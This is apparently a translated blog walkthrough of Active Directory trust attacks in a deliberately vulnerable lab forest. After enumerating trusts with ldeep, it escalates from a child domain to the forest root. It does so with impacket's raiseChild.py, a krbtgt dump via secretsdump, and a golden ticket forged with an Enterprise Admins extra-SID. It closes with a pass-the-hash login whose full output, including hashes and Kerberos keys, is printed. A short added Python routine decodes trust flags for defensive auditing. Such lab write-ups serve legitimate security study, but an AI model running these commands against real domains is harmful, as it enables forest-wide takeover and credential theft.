Trusts:Enumerate Trust
• Enumerate the trust relationships with ldeep
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 trusts
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.12 trusts
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 trusts
dn: CN=essos.local,CN=System,DC=sevenkingdoms,DC=local
cn: essos.local
securityIdentifier: S-1-5-21-3888409149-2120389158-266936499
name: essos.local
trustDirection: bidirectional
trustPartner: essos.local
trustType: Windows domain running Active Directory
trustAttributes: FOREST_TRANSITIVE | TREAT_AS_EXTERNAL
flatName: ESSOS
dn: CN=north.sevenkingdoms.local,CN=System,DC=sevenkingdoms,DC=local
cn: north.sevenkingdoms.local
securityIdentifier: S-1-5-21-3148635071-1740920068-3009913003
name: north.sevenkingdoms.local
trustDirection: bidirectional
trustPartner: north.sevenkingdoms.local
trustType: Windows domain running Active Directory
trustAttributes: WITHIN_FOREST
flatName: NORTH
---
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.12 trusts
dn: CN=sevenkingdoms.local,CN=System,DC=essos,DC=local
cn: sevenkingdoms.local
securityIdentifier: S-1-5-21-3909331934-1368599321-1895990551
name: sevenkingdoms.local
trustDirection: bidirectional
trustPartner: sevenkingdoms.local
trustType: Windows domain running Active Directory
trustAttributes: FOREST_TRANSITIVE
flatName: SEVENKINGDOMS
• The trust from sevenkingdoms to essos is FOREST_TRANSITIVE | TREAT_AS_EXTERNAL because SID history is enabled; the trust from essos to sevenkingdoms is FOREST_TRANSITIVE.
• Alternatively, the equivalent LDAP query is (objectCategory=trustedDomain):
ldeep ldap -u tywin.lannister -p 'powerkingftw135' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(objectCategory=trustedDomain)'
Bidirectional domain trust between north.sevenkingdoms.local and sevenkingdoms.local (child/parent relationship):
WITHIN_FOREST (intra-forest trust): used for trusts between domains of the same forest; it allows seamless access and authentication between users and resources.
Between essos.local and sevenkingdoms.local: FOREST_TRANSITIVE (forest transitive trust): allows a transitive trust between two entire forests.
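To audit trusts from the defender's side, the added example below (my own code, not from the post, ldeep or impacket) decodes the raw trustAttributes and trustDirection integers behind the ldeep output into the flag names shown above and reports what each combination means for SID filtering. The bit values are the MS-ADTS trustAttributes constants; the sample trusts are constructed from the three entries enumerated above.

```python
# trustAttributes bit flags (MS-ADTS 6.1.6.7.9)
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",   # SID filtering enforced on an external trust
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",        # parent/child or tree-root trust inside one forest
    0x0040: "TREAT_AS_EXTERNAL",    # forest trust that lets SID history through
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}
TRUST_DIRECTION = {0: "disabled", 1: "inbound", 2: "outbound", 3: "bidirectional"}

def decode_attributes(value: int) -> list[str]:
    """Return the flag names set in a raw trustAttributes value, lowest bit first."""
    names = [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTES)  # bits this table has no name for
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:x}")
    return names

def audit_trust(partner: str, direction: int, attributes: int) -> dict:
    """Classify one trustedDomain object and explain what it means for SID filtering."""
    flags = decode_attributes(attributes)
    findings = []
    if "WITHIN_FOREST" in flags:
        findings.append("intra-forest trust: SID history is not filtered, so a "
                        "compromised child domain yields the whole forest")
    elif "FOREST_TRANSITIVE" in flags and "TREAT_AS_EXTERNAL" in flags:
        findings.append("forest trust with SID history enabled (TREAT_AS_EXTERNAL); "
                        "turn it off with netdom trust ... /enablesidhistory:no")
    elif "FOREST_TRANSITIVE" in flags:
        findings.append("forest trust with default SID filtering: only SIDs from "
                        "the partner forest's own domains are accepted")
    elif "QUARANTINED_DOMAIN" not in flags:
        findings.append("external trust without QUARANTINED_DOMAIN: SID filtering off")
    return {"partner": partner, "direction": TRUST_DIRECTION.get(direction, "unknown"),
            "flags": flags, "findings": findings}

# Constructed sample: the three trusts ldeep listed above, as raw integer values.
SAMPLE_TRUSTS = [("essos.local", 3, 0x48), ("north.sevenkingdoms.local", 3, 0x20),
                 ("sevenkingdoms.local", 3, 0x08)]

def audit_all(trusts=SAMPLE_TRUSTS) -> list[dict]:
    """Audit every (partner, trustDirection, trustAttributes) tuple."""
    return [audit_trust(*t) for t in trusts]
```

Feed it the integer values of trustAttributes and trustDirection from a raw LDAP search of (objectCategory=trustedDomain) to get the same classification for a real forest.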
Trusts:Domain Trust - child/parent
(north.sevenkingdoms.local -> sevenkingdoms.local)
Now assume we own the north.sevenkingdoms.local domain, have dumped ntds, and have obtained the NT hashes of every user in the north domain.
RaiseMeUp - Escalate with impacket raiseChild
The simplest way to escalate from the child domain to the parent domain is impacket's raiseChild.py script.
eddard.stark is a domain admin of north.sevenkingdoms.local (192.168.56.11).
The stock impacket package is used here.
raiseChild.py north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'
wulala@wulala-VirtualBox:~/intranet-tools/impacket-0.10.0/examples$ python3 raiseChild.py north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra
[*] Raising child domain north.sevenkingdoms.local
[*] Forest FQDN is: sevenkingdoms.local
[*] Raising north.sevenkingdoms.local to sevenkingdoms.local
[*] sevenkingdoms.local Enterprise Admin SID is: S-1-5-21-3909331934-1368599321-1895990551-519
[*] Getting credentials for north.sevenkingdoms.local
north.sevenkingdoms.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
north.sevenkingdoms.local/krbtgt:aes256-cts-hmac-sha1-96s:f96ec2ef58e7ac5d8670ff97bafe7e16d27a25c0d29774e64f7b8f4b43ee78dd
[*] Getting credentials for sevenkingdoms.local
sevenkingdoms.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8c525ba9867b56c3051c18377956d813:::
sevenkingdoms.local/krbtgt:aes256-cts-hmac-sha1-96s:b8ee160fc25bc6b24eed71dde183fd8a92ad83099eaf81f6e99876db570b13bf
[*] Target User account name is Administrator
sevenkingdoms.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
sevenkingdoms.local/Administrator:aes256-cts-hmac-sha1-96s:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4d
This produces the krbtgt and forges a golden ticket for the forest Enterprise Admin, then logs in to the forest and retrieves the target account (the default Administrator, RID 500):
sevenkingdoms.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
cme smb 192.168.56.10 -u Administrator -H ':c66d72021a2d4744409969a581a1705e' -d sevenkingdoms.local
wulala@wulala-VirtualBox:~$ cme smb 192.168.56.10 -u Administrator -H ':c66d72021a2d4744409969a581a1705e' -d sevenkingdoms.local
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [+] sevenkingdoms.local\Administrator::c66d72021a2d4744409969a581a1705e (Pwn3d!)
Golden ticket + ExtraSid
• First, dump the krbtgt of the north domain we control
# dump child ntds and get krbtgt NT hash
secretsdump.py -just-dc-user north/krbtgt north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11
wulala@wulala-VirtualBox:~/intranet-tools/impacket-0.10.0/examples$ python3 secretsdump.py -just-dc-user north/krbtgt north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f96ec2ef58e7ac5d8670ff97bafe7e16d27a25c0d29774e64f7b8f4b43ee78dd
krbtgt:aes128-cts-hmac-sha1-96:6265aa3383780121404d894cd629f3ba
krbtgt:des-cbc-md5:5d80d049ecec835d
[*] Cleaning up...
We now have the krbtgt:
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d1a786683542dc8ce782c3af71dbecc5:::
• Then obtain the SIDs of the child domain and the parent domain
# dump child domain SID (Security Identifier)
lookupsid.py -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.11 0
[*] Domain SID is: S-1-5-21-3148635071-1740920068-3009913003
# dump parent domain SID
lookupsid.py -domain-sids north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'@192.168.56.10 0
[*] Domain SID is: S-1-5-21-3909331934-1368599321-1895990551
OK ~
Now create the golden ticket: append "-519" (the Enterprise Admins RID) to the end of the extra-sid (see the Microsoft SID documentation below).
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
python3 ticketer.py -nthash d1a786683542dc8ce782c3af71dbecc5 \
    -domain-sid S-1-5-21-3148635071-1740920068-3009913003 \
    -domain north.sevenkingdoms.local \
    -extra-sid S-1-5-21-3909331934-1368599321-1895990551-519 \
    goldenuser
export KRB5CCNAME=goldenuser.ccache
secretsdump.py -k -no-pass -just-dc-ntlm north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local
It failed outright. I went through a round of troubleshooting and nothing worked. It is probably an issue with the environment. That is roughly the flow anyway.
Honestly unbelievable: doing it step by step just dies, so better to use the earlier script directly. One shot and done.
Originally published on the WeChat public account (wulala520): Trusts:Enumerate Trust